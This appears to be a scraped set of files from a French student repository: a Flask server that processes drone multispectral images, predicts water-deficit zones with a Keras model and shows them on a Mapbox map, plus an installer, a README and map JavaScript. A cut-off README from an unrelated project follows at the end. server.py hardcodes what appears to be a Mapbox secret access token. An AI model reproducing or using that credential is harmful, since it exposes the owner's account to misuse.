"ccdccd83adac3e7e1f230628d11ea53f7baf7242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21657, "license_type": "no_license", "max_line_length": 162, "num_lines": 510, "path": "/flask_mapbox/server.py", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "import os\nimport pandas as pd\nfrom skimage import io\nimport numpy as np \nfrom tensorflow.keras.models import load_model\n\nfrom flask import Flask, request, session, g, redirect, \\\n url_for, abort, render_template, flash, Response\n\n\nimport os\nimport tifffile as tiff\nimport numpy as np \nfrom shutil import copyfile\nfrom multiprocessing import Pool\nfrom skimage import io\nfrom skimage.transform import resize\nfrom geographiclib.constants import Constants\nfrom geographiclib.geodesic import Geodesic\nfrom shapely.ops import unary_union\nfrom shapely.geometry import Polygon\nfrom math import atan, tan, sqrt\nimport gdal\nimport time\nimport random\nimport json\nimport shutil\n\nIMG_HEIGHT_RAW = 512\nIMG_WIDTH_RAW = 640\nIMG_HEIGHT_16 = 128\nIMG_WIDTH_16 = 160\nNB_CHANNELS = 7\n\n#architecture du projet \nbaseFolder = \"../data/preprocessing/\"\nclippedImagesFolder = '../data/preprocessing/clippedImages/16/'\ndatasetFolder = '../data/images/'\ncoordsFilePath = \"../data/preprocessing/imagesCoords.csv\"\nresizedImagesFolder = \"../data/preprocessing/resizedImages/\"\nstackedImagesFolder = \"../data/preprocessing/stackedImages/\" \nmodelPath = \"../data/model/model_WD.h5\"\n\n# variables globales d'avancement des traitements\nclipDone = False\nwritingDone = False\npredictProgress = 0\n\n#configuration de flask\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_envvar('APP_CONFIG_FILE', silent=True)\nMAPBOX_ACCESS_KEY = 'sk.eyJ1IjoiZnJpZW5kbHlmcnVpdHMxIiwiYSI6ImNrY3VoazNqeTBqeDkycnQyODlrbXBlZmgifQ.BqVVTNvgJSmxPLx7bV6JWA'\n\n# page des traitements\[email protected]('/')\ndef preprocessing():\n return render_template('preprocessing.html')\n\n# page cherchee a l'activation du bouton de lancement du traitement\[email protected]('/start_over')\ndef start_over():\n clipFolder = '../data/preprocessing/clippedImages/'\n imagesFolder = os.path.join(clippedImagesFolder,'images')\n dirPath = baseFolder\n #suppression des dossiers si il y a eu un traitement precedent\n if os.path.exists(dirPath) and os.path.isdir(dirPath):\n print(dirPath)\n shutil.rmtree(dirPath, ignore_errors=True)\n dirsToCreate = [resizedImagesFolder,stackedImagesFolder,clipFolder,clippedImagesFolder,imagesFolder] \n #cration des dossiers du traitement du projet\n for dirToCreate in dirsToCreate:\n print(dirToCreate)\n os.makedirs(dirToCreate)\n return \"ok\"\n\n#phase de redimensionnement\[email protected]('/resize_img')\ndef resize_img():\n files = [f for f in os.listdir(datasetFolder) if '.tif' in f]\n multibandImages = []\n pool = Pool(3)\n # pour chaque images multispectrale, on la redimensionne, sinon on ajoute l'infrarouge au dossier final\n for file in files:\n if \"nm\" in file:\n multibandImages.append(file)\n else :\n #copie des fichiers aux bonnes dimensions\n copyfile(\n os.path.join(datasetFolder, file),\n os.path.join(resizedImagesFolder, file)\n )\n #parallelisation de la fonction de resize\n pool.map(resizeImages,multibandImages)\n pool.close()\n return str(200)\n\n# fonction de progression du redimensionnement \[email protected]('/progress_resize')\ndef progress_resize():\n resizedFiles = [f for f in os.listdir(resizedImagesFolder) if '.tif' in f]\n files = [f for f in os.listdir(datasetFolder) if '.tif' in f]\n # evaluation des images traitees par rapport au total des images\n return str(int(100 * (len(resizedFiles)/len(files))))\n\n#fonction d empilement des images\[email protected]('/stack_img')\ndef stack_img():\n pool = Pool()\n files = [f for f in os.listdir(datasetFolder) if '.tif' in f]\n imagesToStackArray = []\n while files:\n #on selectionne un index (le numero de chaque image)\n imageIndex = files[0].split('_')[0]\n #on regroupe les differentes bandes par leur numero\n imagesToStack = [image for image in files if imageIndex in image]\n imagesToStack.sort()\n #puis on les supprime de la liste des images restantes\n files = list(set(files) - set(imagesToStack))\n if (len(imagesToStack) == 7):\n imagesToStackArray.append(imagesToStack)\n else:\n for imageName in imagesToStack:\n os.remove(os.path.join(resizedImagesFolder,imageName))\n\n pool.map(stackImages,imagesToStackArray)\n pool.close()\n return \"ok\"\n\n#progression des empilements\[email protected]('/progress_stack')\ndef progress_stack():\n\n stackImages = [f for f in os.listdir(stackedImagesFolder) if '.tif' in f]\n resizedFiles = [f for f in os.listdir(resizedImagesFolder) if '.tif' in f]\n # evaluation des images traitees par rapport au total des images\n return str(int(700 * (len(stackImages))/len(resizedFiles)))\n\n\n#fonction de prediction\[email protected]('/prediction')\ndef prediction():\n global writingDone\n #TODO : pretraiter les images pour avoir les .csv correspondants\n imageFolder = os.path.join(clippedImagesFolder,'images')\n #recuperation des images detectees comme OW/WD, ainsi que leurs coordonnees \n areas = getCoords(modelPrediction(imageFolder))\n #affichage de la page html contenant la carte (mapbox)\n f=open(os.path.join(clippedImagesFolder,'areas.txt'),'w')\n f.write(json.dumps(areas))\n f.close()\n writingDone = True\n return \"ok\"\n\n#fonction d affichage de la prediction\[email protected]('/display_prediction')\ndef dispPrediction():\n # chargement des zones de deficit hydrique\n with open(os.path.join(clippedImagesFolder,'areas.txt')) as f:\n areas = json.load(f)\n # rendu de la carte avec les zones hydriques\n return render_template(\n 'mapbox_js.html', \n ACCESS_KEY=MAPBOX_ACCESS_KEY,\n areas = areas\n )\n\ndef resizeImages(imageName):\n try:\n #ratio entre les focales de la bande verte (570nm) et les autres bandes\n focalRatio570 = 0.525000525000525\n #on applique une reduction de la width pour avoir un ratio egal a celui de l'infrarouge\n #puis on resize l'image a la taille de l'infrarouge\n image = tiff.imread(os.path.join(datasetFolder,imageName))\n #transformation en image 16 bits\n image *= 16\n cropped = image\n if (\"570nm\" in imageName):\n greenHeight = len(image)\n greenWidth = len(image[0])\n #on augmente la taille de l'image par le ratio des lentilles focales\n image_resized = np.floor(resize(image, (greenHeight // focalRatio570, greenWidth // focalRatio570),\n anti_aliasing=True,preserve_range=True))\n heightDiff = int((len(image_resized) - greenHeight)/2)\n widthDiff = int((len(image_resized[0]) - greenWidth)/2)\n image = image_resized[heightDiff:(heightDiff + greenHeight), widthDiff:(widthDiff + greenWidth)]\n #decoupage specifique a la position de la camera utilisee\n if (\"450nm\" in imageName): \n cropped = image[8:len(image),110:len(image[0])]\n elif (\"530nm\" in imageName): \n cropped = image[0:len(image) - 10,78:len(image[0])]\n elif (\"570nm\" in imageName): \n cropped = image[80:len(image),138:len(image[0])]\n elif (\"675nm\" in imageName): \n cropped = image[20:len(image),90:len(image[0])]\n elif (\"730nm\" in imageName): \n cropped = image[0:len(image) - 16,72:len(image[0])]\n elif (\"850nm\" in imageName): \n cropped = image[0:len(image) - 45,110:len(image[0])] \n #redimensionnement final \n resized = resize(cropped, (IMG_HEIGHT_RAW,IMG_WIDTH_RAW),preserve_range=True)\n #enregistrement de l image resultante\n tiff.imsave(os.path.join(resizedImagesFolder,imageName),resized.astype(np.uint16))\n except tifffile.tifffile.TiffFileError:\n print(imageName)\n\ndef stackImages(imagesToStack):\n bands_data = []\n #on traite les images selectionnees\n for imageName in imagesToStack[0:7]:\n #on recupère leur bande spectrale\n try :\n image = tiff.imread(os.path.join(resizedImagesFolder,imageName))\n except:\n print(imageName)\n bands_data.append(image)\n try :\n #empilement des bandes\n stackedImage = np.dstack((bands_data[0],bands_data[1],bands_data[2],bands_data[3],bands_data[4],bands_data[5],bands_data[6]))\n #enregistrement de l image resultante\n tiff.imsave(os.path.join(stackedImagesFolder,imageName.split('_')[0] + \".tif\"), stackedImage, planarconfig='contig')\n except:\n #si il y a une erreur, on supprime les images associees\n for imageName in imagesToStack[0:7]:\n os.remove(os.path.join(resizedImagesFolder,imageName))\n\n \n#recuperation des coordonnees du coin de l image calculee\ndef getEndpoint(lat1, lon1, d, bearing):\n geod = Geodesic(Constants.WGS84_a, Constants.WGS84_f)\n d = geod.Direct(lat1, lon1, bearing, d)\n return d['lat2'], d['lon2']\n\n#recupere les informations de l'image .tiff\ndef getImageData(imageName):\n\n #dictionnaire des informations de l'image\n imageData = {}\n #ouverture de l'image\n tif = tiff.TiffFile(os.path.join(datasetFolder, imageName.split('.')[0] + \"_lwir.tif\"))\n #calcul du champ de vue de la camera\n for key in tif.pages[0].tags[\"ExifTag\"].value.items():\n if \"FocalLength\" in str(key):\n # longueur et largeur de l'objectif en x et y selon le type de camera\n xSensor = 4.8 if \"nm\" in imageName else 10.8801\n ySensor = 3.6 if \"nm\" in imageName else 8.704\n focalLength = key[1][0]\n #calcul du champ de vue en largeur\n fovWide = 2*atan(xSensor/(2*focalLength))\n #calcul du champ de vue en hauteur\n fovTall = 2*atan(ySensor/(2*focalLength))\n #calcul de latitude, longitude, footprint\n for key, value in tif.pages[0].tags[\"GPSTag\"].value.items():\n #la latitude est définie en ratio de degrés, minutes, secondes\n if key == \"GPSLatitude\":\n imageData[\"latitude\"] = (value[0]/value[1])+((value[2]/value[3])/60)+((value[4]/value[5])/3600)\n #la longitude est définie en ratio de degrés, minutes, secondes\n elif key == \"GPSLongitude\": \n imageData[\"longitude\"] = (value[0]/value[1])+((value[2]/value[3])/60)+((value[4]/value[5])/3600)\n #(altitude par rapport au niveau de la mer)\n elif key == \"GPSAltitude\":\n #calcul des centerToCornerDistances du drone par rapport aux quatres côtés de l'image\n altitude = value[0]\n bottom = altitude * tan(-0.5 * fovWide)\n top = altitude * tan(0.5 * fovWide)\n left = altitude * tan(-0.5 * fovTall)\n right = altitude * tan(0.5 * fovTall)\n #calcul de la distance entre le centre de l'image (position de la camera) et un des quatres angles de l'image\n imageData[\"centerToCornerDistance\"] = sqrt((right - left)**2 + (top - bottom)**2)/2\n imageData[\"altitude\"] = value[0]\n\n #orientation par rapport au nord pour le calcul de bearing\n elif key == \"GPSTrack\":\n # imageData[\"northOrientation\"] = (value[0]/value[1])\n imageData[\"northOrientation\"] = 0\n return imageData\n\n\n#save image data in a csv file\ndef imageDataToCsv(imageList, coordsFile):\n for image in imageList:\n finalPoints = []\n #on récupère les données géographiques de l'image\n currentImageData = getImageData(image)\n #bearing (angle) de chaque coin de l'image par rapport au centre de celle-ci et le \n #https://www.fao.org/tempref/FI/CDrom/FAO_Training/FAO_Training/General/x6707f/GR97.GIF\n angleBearings = [315-180,45-180,225-180,135-180]\n if (int(currentImageData[\"altitude\"]) > 30):\n #calcul des latitutes et longitudes des angles de l'images\n for angle in angleBearings:\n finalPoints.append(getEndpoint(\n currentImageData[\"latitude\"],currentImageData[\"longitude\"],\n currentImageData[\"centerToCornerDistance\"],\n angle + currentImageData[\"northOrientation\"]))\n #ajout au fichier csv de l'image et ses coordonnees\n #on inverse les points 3 et 4 pour le parcours des points lors des etapes futures\n coordsFile.write(\n image + \"\\t\" \\\n + str(finalPoints[0][0]) + \" \" + str(finalPoints[0][1]) + \"\\t\" \\\n + str(finalPoints[1][0]) + \" \" + str(finalPoints[1][1]) + \"\\t\" \\\n + str(finalPoints[3][0]) + \" \" + str(finalPoints[3][1]) + \"\\t\" \\\n + str(finalPoints[2][0]) + \" \" + str(finalPoints[2][1]))\n coordsFile.write(\"\\n\")\n coordsFile.close()\n\n\n#fonction de lecture d'un fichier\ndef readFile(filePath):\n file = open(filePath,'r')\n return file.readlines()\n \n#recuperation des points originaux assignes a l'image\ndef getPreviousPoints(line):\n previousPoints = []\n pointsToSplit = line.strip('\\n').split('\\t')\n pointsToSplit = pointsToSplit[1:]\n for pointToSplit in pointsToSplit:\n previousPoints.append((pointToSplit.split(' ')[0],pointToSplit.split(' ')[1]))\n return previousPoints\n\ndef getCenterPoint(p1,p2):\n return ((float(p1[0]) + float(p2[0]))/2,(float(p1[1]) + float(p2[1]))/2)\n\ndef getNewCorners(p1,p2,p3,p4):\n return getCenterPoint(p1,p3),getCenterPoint(p1,p2),getCenterPoint(p2,p3),getCenterPoint(p3,p4),getCenterPoint(p4,p1)\n\ndef getNewRectangles(p1,p2,p3,p4):\n #calcul des points centraux entre deux coins de l'image\n centerPoint, centerp1p2, centerp2p3, centerp3p4, centerp4p1 = getNewCorners(p1,p2,p3,p4)\n #définition des quatre nouveaux rectangles\n newRectangles = []\n newRectangles.append([p1, centerp1p2, centerPoint, centerp4p1])\n newRectangles.append([centerp1p2, p2, centerp2p3, centerPoint])\n newRectangles.append([centerPoint, centerp2p3, p3, centerp3p4])\n newRectangles.append([centerp4p1, centerPoint, centerp3p4, p4])\n return newRectangles\n\n#fonction de decoupage des images en 4\ndef splitImage(newImagesCoordsFile,imagePath, line):\n # index du morceau d'image actuel \n indexRect = 0\n #on recupere les coordonées des coins originaux de l'image\n imageName = line.strip('\\n').split('\\t')[0]\n previousPoints = getPreviousPoints(line)\n #on récupère les dimensions en X et Y de l'image\n band = gdal.Open(os.path.join(imagePath,imageName)).GetRasterBand(1)\n xSize = band.XSize \n ySize = band.YSize\n stepX = xSize//4\n stepY = ySize//4\n croppedImages = []\n img = io.imread(os.path.join(imagePath, imageName))\n #definition des quatres nouveaux rectangles issus des coins et milieux des aretes\n newRectangles4 = getNewRectangles(previousPoints[0], previousPoints[1], previousPoints[2], previousPoints[3])\n for j in range(0, ySize, stepY):\n \n #on redécoupe chaque rectangle en 4\n newRectangles16 = getNewRectangles(newRectangles4[j//stepY][0], newRectangles4[j//stepY][1], newRectangles4[j//stepY][2], newRectangles4[j//stepY][3])\n for i in range(0, xSize, stepX):\n \n # on enregistre les nouvelles coordonnées des images découpées dans le fichier .csv\n newImagesCoordsFile.write(\n imageName.split('.')[0] + '_' + str(indexRect) + \".tif\" + \"\\t\" + \\\n str(newRectangles16[indexRect%4][0][0]) + \" \" + str(newRectangles16[indexRect%4][0][1]) + \"\\t\" + \\\n str(newRectangles16[indexRect%4][1][0]) + \" \" + str(newRectangles16[indexRect%4][1][1]) + \"\\t\" + \\\n str(newRectangles16[indexRect%4][2][0]) + \" \" + str(newRectangles16[indexRect%4][2][1]) + \"\\t\" + \\\n str(newRectangles16[indexRect%4][3][0]) + \" \" + str(newRectangles16[indexRect%4][3][1]) + \"\\n\"\n )\n newImage = img[j:j+stepY, i:i+stepX,:]\n croppedImages.append(newImage)\n indexRect +=1 \n #en decoupant les images de droite a gauche (differement de notre ordre de decoupage des lat/long)\n #on definit ainsi un nouvel index correspondant aux index des rectangles du csv\n cropIndex = [0,1,5,4,2,3,7,6,10,11,15,14,8,9,13,12]\n croppedImages = np.array(croppedImages)\n for i in range(len(croppedImages)):\n io.imsave(os.path.join(clippedImagesFolder, \"images\",imageName.split('.')[0] + '_' + str(i) + \".tif\"), croppedImages[cropIndex[i]], planarconfig='contig')\n\[email protected]('/clip_img')\ndef clipImages():\n global clipDone\n global areas\n #création du fichiers .csv des coordonnées des images\n coordsFile = open(coordsFilePath,\"w\")\n coordsFile.write(\"imageName\"+\"\\t\"+\"point1\"+\"\\t\"+\"point2\"+\n \"\\t\"+\"point3\"+\"\\t\"+\"point4\")\n coordsFile.write(\"\\n\")\n imageList = os.listdir(stackedImagesFolder)\n imageList.sort()\n #extraction et enregistrement des données de chaque image\n imageDataToCsv(imageList, coordsFile)\n #fichier .csv comprenant les coordonnées pour les 4 nouvelles images\n #issues de chaque image du dossier d'entrée\n newImagesCoordsFile = open(clippedImagesFolder + \"newImagesCoords.csv\",\"w\")\n newImagesCoordsFile.write(\"imageName\" + \"\\t\" + \"point1\" + \"\\t\" + \"point2\"\n \"\\t\" + \"point3\" + \"\\t\" + \"point4\" + \"\\n\")\n # on recupere les anciennes coordonnees\n lines = readFile(coordsFilePath)\n #ligne de nom des colonnes\n lines.pop(0)\n \n #on découpe chaque image du dossier\n for line in lines:\n #on récupère la ligne du csv correspondante \n splitImage(newImagesCoordsFile,stackedImagesFolder,line)\n newImagesCoordsFile.close()\n clipDone = True\n areas = []\n return \"ok\"\n\n#progression du decoupage des images \[email protected]('/progress_clip')\ndef progress_clip():\n clippedFiles = [f for f in os.listdir(os.path.join(clippedImagesFolder,'images')) if '.tif' in f]\n stackedFiles = [f for f in os.listdir(stackedImagesFolder) if '.tif' in f]\n if (clipDone):\n return str(100)\n else :\n return str(int(100 * (len(clippedFiles)/(len(stackedFiles)*16))))\n \n#progression de la prediction des images\[email protected]('/progress_predict')\ndef progress_predict():\n clippedFiles = [f for f in os.listdir(os.path.join(clippedImagesFolder,'images')) if '.tif' in f]\n if (not writingDone):\n return str(int(90 * predictProgress/(len(clippedFiles))))\n else :\n return str(int(100 * predictProgress/(len(clippedFiles))))\n\n#fonction de lecture d'un fichier csv\ndef readDataFile(fileName, separator=','):\n pd.set_option(\"display.precision\", 20)\n dataFile = pd.read_csv(fileName, sep=separator, encoding=\"utf-8\")\n dataFile = dataFile.fillna(\"\")\n return dataFile\n\ndef getCoords(listSolutions):\n dataFile = os.path.join(clippedImagesFolder,'newImagesCoords.csv')\n finalCoords = []\n mergePolygons = []\n # lecture des coordonnees des images decoupees\n imageDataFrame = readDataFile(dataFile, \"\\t\")\n for nameSol, waterType in listSolutions:\n #boucles des intersection des cibles et les images de drone\n for _,imageCoords in imageDataFrame.iterrows():\n #recuperation du nom de l'image\n imageName = imageCoords['imageName']\n if (nameSol == imageName):\n # on recupere les quatres coins de celle ci\n p0 = imageCoords['point1'].split(\" \")\n p1 = imageCoords['point2'].split(\" \")\n p2 = imageCoords['point3'].split(\" \")\n p3 = imageCoords['point4'].split(\" \")\n newCoordsSol = [[float(p0[1]),float(p0[0])], [float(p1[1]),float(p1[0])], [float(p2[1]),float(p2[0])], [float(p3[1]),float(p3[0])]]\n polyCoords = [(float(p0[1]), float(p0[0])),(float(p1[1]), float(p1[0])),(float(p2[1]), float(p2[0])),(float(p3[1]), float(p3[0]))]\n finalCoords.append([nameSol,newCoordsSol,waterType])\n mergePolygons.append(Polygon(polyCoords))\n print(\"unary union\")\n mergedPoly = unary_union(mergePolygons)\n multiPolygonList = []\n i = 0\n if mergedPoly.geom_type == 'Polygon':\n mergedPoly = [mergedPoly]\n\n for poly in mergedPoly:\n formattedPoly = []\n polyPoints = list(poly.exterior.coords)\n for point in polyPoints:\n formattedPoly.append([float(point[0]),float(point[1])])\n multiPolygonList.append([\"Polygone \" + str(i),formattedPoly,waterType])\n i += 1\n # finalCoords = [listSolutions[0],mergedPoly,waterType] \n # return finalCoords\n return multiPolygonList\n#prediction du modele sur les images en entree\ndef modelPrediction(imageFolder):\n global predictProgress\n #reseau de neurones entraine a classifier WW et WD\n modelWD = load_model(modelPath)\n #dossier des images\n imageList = sorted(os.listdir(imageFolder))\n debut = 0\n fin = min(1000,len(imageList))\n \n listSolutions = []\n\n while (debut != len(imageList)):\n Xs = []\n imageListBatch = imageList[debut:fin]\n #on rescale chaque image avant la prediction\n for p in imageListBatch:\n try :\n img = io.imread(os.path.join(imageFolder,p))\n except:\n print(os.path.join(imageFolder,p))\n # normalisation des images\n if (np.array(img).shape == (IMG_HEIGHT_16,IMG_WIDTH_16,NB_CHANNELS)):\n Xs.append(img/65535.)\n Xs = np.array(Xs)\n #on recupere les images detectees comme WD\n Y_pred = modelWD.predict(Xs)\n # mise au bon format pour le json\n listSolutions.extend([[i,\"WD\"] for (i,j) in zip(imageListBatch,Y_pred) if j >= 0.95])\n debut = fin\n predictProgress = fin\n fin = fin + min(1000,len(imageList) - fin)\n return listSolutions\n\nif (__name__ == '__main__'):\n app.run(threaded=True)" }, { "alpha_fraction": 0.6181474328041077, "alphanum_fraction": 0.6805292963981628, "avg_line_length": 32.125, "blob_id": "ad9365b9cf8eb5e325dceef78d0412ba6d504ae0", "content_id": "20ff4c5c29212ff92829d7888bd3151f699ce239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 529, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/installation/setup.cpp", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <windows.h>\n\n\nint main() {\n // Python 3.7.1\n system(\"installation\\\\python-3.7.1rc2-amd64.exe\");\n //C++ VC 2015,2017,2019\n system(\"installation\\\\VC_redist.x64.exe\");\n //environnement virtuel\n system(\"python -m venv installation\\\\venvFriendlyFruit &&\"\n \"installation\\\\venvFriendlyFruit\\\\Scripts\\\\activate.bat &&\"\n \"pip install -r installation\\\\requirements.txt --build installation\\\\build &&\"\n \"pip install installation\\\\GDAL-3.1.2-cp37-cp37m-win_amd64.whl\");\n return 0;\n}" }, { "alpha_fraction": 0.7279693484306335, "alphanum_fraction": 0.7614942789077759, "avg_line_length": 46.45454406738281, "blob_id": "b1914b35aec51604af2055c74e93320a841bfdda", "content_id": "73585f0267d7f10bc5af8742b2d3b13349d0db71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 110, "num_lines": 22, "path": "/README.md", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "# projet Friendly Fruit\n\n\n### Installation\n\nLancer setup.exe, qui comprend :\n- Installation de python-3.7.1rc2-amd64.exe (Python 3.7.1)\n- Installation de VC_redist.x64.exe (Visual C++ 2015, 2017 et 2019 64-bits)\n- Création d'un environnement virtuel dans /src/installation/venvFriendlyFruit\n\n### Utilisation\nLancer run.exe :\n- Raffraîchir la page 127.0.0.1:5000 après que le serveur soit lancé sur le terminal\n- Mettre les images issues de la carte SD dans le dossier /src/data/images\n- Appuyer sur le bouton de choix de prédiction entre WD et WD + OW\n- Appuyer sur \"Démarrer\" pour lancer le prétraitement et la prédiction\n\n## Architecture :\n- installation/ : Dossier contenant les dépendances de l'installation du projet\n- data/ : Dossier contenant le dossier des images brutes (/images) et le dossier du modèle à dézipper (/model)\n- flask_mapbox/ : Dossier du projet avec les pages html (/templates) et le js/css associé (/static) et \n\t\t le programme principal (server.py) comprenant les scripts de pré-traitement et la prédiction du réseau\n" }, { "alpha_fraction": 0.40530404448509216, "alphanum_fraction": 0.40985801815986633, "avg_line_length": 37.489688873291016, "blob_id": "01d1187c6b853106e10645486b524a16009162ae", "content_id": "78a6cf2cf5c9a12d718f40be48bab755c803d869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7468, "license_type": "no_license", "max_line_length": 139, "num_lines": 194, "path": "/flask_mapbox/static/js/mapbox_js.js", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "var res = \"\";\n\nmapboxgl.accessToken = 'pk.eyJ1IjoiZnJpZW5kbHlmcnVpdHMxIiwiYSI6ImNrY3VoYXc5cjB6bGcydG80cmVpY3RqbGkifQ.EC5KmCbDEBeVgFHjYXIgzA';\nconst container = document.getElementById('map')\nwindow.addEventListener(\"load\", createMap);\n\nfunction createMap() {\n if (typeof areas !== \"undefined\") {\n var distanceContainer = document.getElementById('distance-info');\n\n // GeoJSON object to hold our measurement features\n var geojson = {\n 'type': 'FeatureCollection',\n 'features': []\n };\n\n // Used to draw a line between points\n var linestring = {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'LineString',\n 'coordinates': []\n }\n };\n // document.getElementById(\"count_areas\").innerHTML += \"<br> Zone(s) trouvée(s) : \" + areas.length + \"<br>\"\n document.getElementById(\"count_areas\").innerHTML += \"<br> Zone(s) en Water Deficit : \" + areas.filter(x => x[2] === 'WD').length \n\n container2 = document.getElementById('map')\n // container2.style.display = \"none\"\n var map = new mapboxgl.Map({\n container: 'map',\n style: 'mapbox://styles/mapbox/satellite-v9',\n center: areas[0][1][0],\n zoom: 18\n });\n\n map.on('load', function () {\n map.addSource('geojson', {\n 'type': 'geojson',\n 'data': geojson\n });\n\n // Add styles to the map\n map.addLayer({\n id: 'measure-points',\n type: 'circle',\n source: 'geojson',\n paint: {\n 'circle-radius': 5,\n 'circle-color': 'blue',\n },\n filter: ['in', '$type', 'Point']\n });\n map.addLayer({\n id: 'measure-lines',\n type: 'line',\n source: 'geojson',\n layout: {\n 'line-cap': 'round',\n 'line-join': 'round'\n },\n paint: {\n 'line-color': 'blue',\n 'line-width': 2.5\n },\n filter: ['in', '$type', 'LineString']\n });\n\n map.on('click', function (e) {\n var features = map.queryRenderedFeatures(e.point, {\n layers: ['measure-points']\n });\n\n // Remove the linestring from the group\n // So we can redraw it based on the points collection\n if (geojson.features.length > 1) geojson.features.pop();\n\n // Clear the Distance container to populate it with a new value\n distanceContainer.innerHTML = '';\n\n // If a feature was clicked, remove it from the map\n if (features.length) {\n var id = features[0].properties.id;\n geojson.features = geojson.features.filter(function (point) {\n return point.properties.id !== id;\n });\n } else {\n var point = {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'Point',\n 'coordinates': [e.lngLat.lng, e.lngLat.lat]\n },\n 'properties': {\n 'id': String(new Date().getTime())\n }\n };\n\n geojson.features.push(point);\n }\n\n if (geojson.features.length > 1) {\n linestring.geometry.coordinates = geojson.features.map(function (\n point\n ) {\n return point.geometry.coordinates;\n });\n\n geojson.features.push(linestring);\n\n // Populate the distanceContainer with total distance\n var value = document.getElementById('distance-info');\n distToMeter = turf.length(linestring)*1000\n value.textContent =\n 'Distance: ' +\n distToMeter.toLocaleString() +\n 'm';\n }\n\n map.getSource('geojson').setData(geojson);\n });\n for (coordonnees of areas) {\n console.log(coordonnees)\n map.addSource(coordonnees[0], {\n 'type': 'geojson',\n 'data': {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'Polygon',\n 'coordinates': [coordonnees[1]]\n },\n properties: {\n 'coordinates': coordonnees[1],\n 'water-type': coordonnees[2],\n },\n\n }\n });\n fillcolor = (coordonnees[2] == \"OW\" ? 'blue' : 'red')\n map.addLayer({\n 'id': coordonnees[0],\n 'type': 'fill',\n 'source': coordonnees[0],\n 'layout': {},\n 'paint': {\n 'fill-color': fillcolor,\n 'fill-opacity': 0.8\n }\n });\n\n\n // Change the cursor to a pointer when the mouse is over the states layer.\n map.on('mouseenter', coordonnees[0], function () {\n map.getCanvas().style.cursor = 'pointer';\n });\n\n // Change it back to a pointer when it leaves.\n map.on('mouseleave', coordonnees[0], function () {\n map.getCanvas().style.cursor = '';\n });\n map.on('mousemove', coordonnees[0], function (e) {\n var distanceFeatures = map.queryRenderedFeatures(e.point, {\n layers: ['measure-points']\n });\n // UI indicator for clicking/hovering a point on the map\n map.getCanvas().style.cursor = distanceFeatures.length\n ? 'pointer'\n : 'crosshair';\n var features = map.queryRenderedFeatures(e.point);\n // Limit the number of properties we're displaying for\n // legibility and performance\n var displayProperties = [\n 'source',\n 'properties',\n ];\n var displayFeatures = features.map(function (feat) {\n var displayFeat = {};\n displayProperties.forEach(function (prop) {\n displayFeat[prop] = feat[prop];\n });\n return displayFeat;\n });\n\n document.getElementById('features-info').innerHTML =\n \"Nom : <br> \" + displayFeatures[0]['source'] + '<br>' +\n \"Water Type : <br> \" + displayFeatures[0]['properties']['water-type']\n + '<br>' +\n \"Coordonnées du polygone : <br> \" + displayFeatures[0]['properties']['coordinates'].replaceAll(\"],[\", \"]<br>[\")\n\n });\n }\n });\n }\n}" } ]
6
waflessnet/SSTD
https://github.com/waflessnet/SSTD
08ef82e24c059343a2848b7a64c618f425b50bba
ee77d69b6ac92b9d33c33ddfb640358e77edffed
ba89e82f7c871f62cd82996dd7a7d54716a18438
refs/heads/master
2020-09-15T06:51:30.580414
2019-11-22T09:44:52
2019-11-22T09:44:52
223,372,043
0
0
NOASSERTION
2019-11-22T09:43:38
2019-11-13T12:11:54
2018-03-12T15:10:16
null
[ { "alpha_fraction": 0.6640035510063171, "alphanum_fraction": 0.6848646402359009, "avg_line_length": 33.1363639831543, "blob_id": "6dde86a63128246f6c53fd9e3aa5935983ed3cc6", "content_id": "825b841def80716185efbf51638e6789248a1a8b", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2253, "license_type": "permissive", "max_line_length": 207, "num_lines": 66, "path": "/README.md", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "[![License](https://img.shields.io/badge/license-BSD-blue.svg)](LICENSE)\n# Single Shot Text Detector with Regional Attention\n\n## Introduction\n\n**SSTD** is initially described in our [ICCV 2017 spotlight paper](https://arxiv.org/abs/1709.00138).\n\n[A third-party implementation of SSTD + Focal Loss](https://github.com/HotaekHan/SSTDNet). Thanks, \nHo taek Han\n\n\n\n<img src='examples/main.png' width='800'>\n\n\nIf you find it useful in your research, please consider citing:\n```\n@inproceedings{panhe17singleshot,\n Title = {Single Shot Text Detector with Regional Attention},\n Author = {He, Pan and Huang, Weilin and He, Tong and Zhu, Qile and Qiao, Yu and Li, Xiaolin},\n Note = {Proceedings of Internatioanl Conference on Computer Vision (ICCV)},\n Year = {2017}\n }\n@inproceedings{panhe16readText,\n Title = {Reading Scene Text in Deep Convolutional Sequences},\n Author = {He, Pan and Huang, Weilin and Qiao, Yu and Loy, Chen Change and Tang, Xiaoou},\n Note = {Proceedings of AAAI Conference on Artificial Intelligence, (AAAI)},\n Year = {2016}\n }\n@inproceedings{liu16ssd,\n Title = {{SSD}: Single Shot MultiBox Detector},\n Author = {Liu, Wei and Anguelov, Dragomir and Erhan, Dumitru and Szegedy, Christian and Reed, Scott and Fu, Cheng-Yang and Berg, Alexander C.},\n Note = {Proceedings of European Conference on Computer Vision (ECCV)},\n Year = {2016}\n }\n```\n\n### Installation\n1. Get the code. We will call the directory that you cloned Caffe into `$CAFFE_ROOT`\n ```Shell\n git clone https://github.com/BestSonny/SSTD.git\n cd SSTD\n ```\n\n2. Build the code. Please follow [Caffe instruction](http://caffe.berkeleyvision.org/installation.html) to install all necessary packages and build it.\n ```Shell\n # Modify Makefile.config according to your Caffe installation.\n cp Makefile.config.example Makefile.config\n make -j8\n # Make sure to 